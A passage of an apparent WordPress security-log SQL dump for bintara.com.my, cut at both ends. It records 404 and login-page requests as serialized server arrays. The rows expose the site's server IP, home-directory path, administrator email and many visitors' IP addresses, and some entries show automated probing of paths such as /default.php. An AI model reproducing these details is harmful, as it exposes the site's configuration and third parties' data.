02770.8351\";s:12:\"REQUEST_TIME\";s:10:\"1569202770\";}}','notice','2019-09-23 01:39:32','2019-09-23 01:39:31',30733504,32547640,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26918,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYpRNhaIaq52cc-9XMJztAAAABI\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.129.131\";s:11:\"REMOTE_PORT\";s:5:\"57783\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpRNhaIaq52cc-9XMJztAAAABI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569345846.1882\";s:12:\"REQUEST_TIME\";s:10:\"1569345846\";}}','notice','2019-09-24 17:24:07','2019-09-24 17:24:06',30758440,32563376,'https://bintara.com.my/our-history/about1/',1,0,'27.102.129.131'),(26917,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"92.247.142.182\";s:11:\"REMOTE_PORT\";s:5:\"46473\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpMEzaLLIBQ58gwNl2@DQAAAMs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569344531.1962\";s:12:\"REQUEST_TIME\";s:10:\"1569344531\";}}','notice','2019-09-24 17:02:13','2019-09-24 17:02:11',30812512,32625272,'https://bintara.com.my/?page_id=18',1,0,'92.247.142.182'),(26916,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/blog/tag/logitech-rally/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYpLk96TjIfvDQGV8ED0ogAAARE\";s:12:\"REDIRECT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"REMOTE_ADDR\";s:13:\"141.8.142.158\";s:11:\"REMOTE_PORT\";s:5:\"63911\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:10:\"SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpLk96TjIfvDQGV8ED0ogAAARE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569344404.1746\";s:12:\"REQUEST_TIME\";s:10:\"1569344404\";}}','notice','2019-09-24 17:00:07','2019-09-24 17:00:05',29648048,31464664,'https://bintara.com.my/blog/tag/logitech-rally/',1,0,'141.8.142.158'),(26915,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/blog/tag/logitech-rally/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYpHvfkhYHnrm8JYuJWFcAAAAIc\";s:12:\"REDIRECT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"REMOTE_ADDR\";s:13:\"141.8.142.158\";s:11:\"REMOTE_PORT\";s:5:\"52795\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:10:\"SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpHvfkhYHnrm8JYuJWFcAAAAIc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569343421.427\";s:12:\"REQUEST_TIME\";s:10:\"1569343421\";}}','notice','2019-09-24 16:43:43','2019-09-24 16:43:41',29645920,31455928,'https://bintara.com.my/blog/tag/logitech-rally/',1,0,'141.8.142.158'),(26914,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:10:\"/register/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/register/\";s:19:\"REDIRECT_SCRIPT_URL\";s:10:\"/register/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYo9bzsZuynGEzmE1y1-IgAAABc\";s:12:\"REDIRECT_URL\";s:10:\"/register/\";s:11:\"REMOTE_ADDR\";s:10:\"5.188.84.9\";s:11:\"REMOTE_PORT\";s:5:\"62414\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"https://bintara.com.my/register/\";s:10:\"SCRIPT_URL\";s:10:\"/register/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYo9bzsZuynGEzmE1y1-IgAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569340783.2957\";s:12:\"REQUEST_TIME\";s:10:\"1569340783\";}}','notice','2019-09-24 15:59:45','2019-09-24 15:59:43',31147600,32952288,'https://bintara.com.my/register/',1,0,'5.188.84.9'),(26910,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:68:\"Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20100101 Firefox/60.0.2\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"177.38.166.211\";s:11:\"REMOTE_PORT\";s:5:\"45574\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYn5KzsZuynGEzmE1y1b@gAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569323307.1952\";s:12:\"REQUEST_TIME\";s:10:\"1569323307\";}}','notice','2019-09-24 11:08:30','2019-09-24 11:08:27',31316016,33122680,'https://bintara.com.my/?page_id=18',1,0,'177.38.166.211'),(26908,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:123:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/66.0.3359.181 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"197.235.12.130\";s:11:\"REMOTE_PORT\";s:5:\"32823\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYnsHn@TiEpPz-1@8Ie5aAAAAZA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569319966.7866\";s:12:\"REQUEST_TIME\";s:10:\"1569319966\";}}','notice','2019-09-24 10:12:49','2019-09-24 10:12:47',31205912,33018624,'https://bintara.com.my/?page_id=18',1,0,'197.235.12.130'),(26909,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/default.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/default.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/default.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYn0b3@TiEpPz-1@8Ie75wAAAZc\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/default.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/default.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYn0b3@TiEpPz-1@8Ie75wAAAZc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"208.113.186.193\";s:11:\"REMOTE_PORT\";s:5:\"39180\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/default.php\";s:10:\"SCRIPT_URL\";s:12:\"/default.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYn0b3@TiEpPz-1@8Ie75wAAAZc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569322095.2069\";s:12:\"REQUEST_TIME\";s:10:\"1569322095\";}}','notice','2019-09-24 10:48:16','2019-09-24 10:48:15',30756768,32566336,'https://bintara.com.my/default.php',1,0,'208.113.186.193'),(26907,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"54554\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYnjGDsZuynGEzmE1y1R7QAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569317656.8583\";s:12:\"REQUEST_TIME\";s:10:\"1569317656\";}}','notice','2019-09-24 09:34:18','2019-09-24 09:34:17',30813024,32633016,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(26906,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; 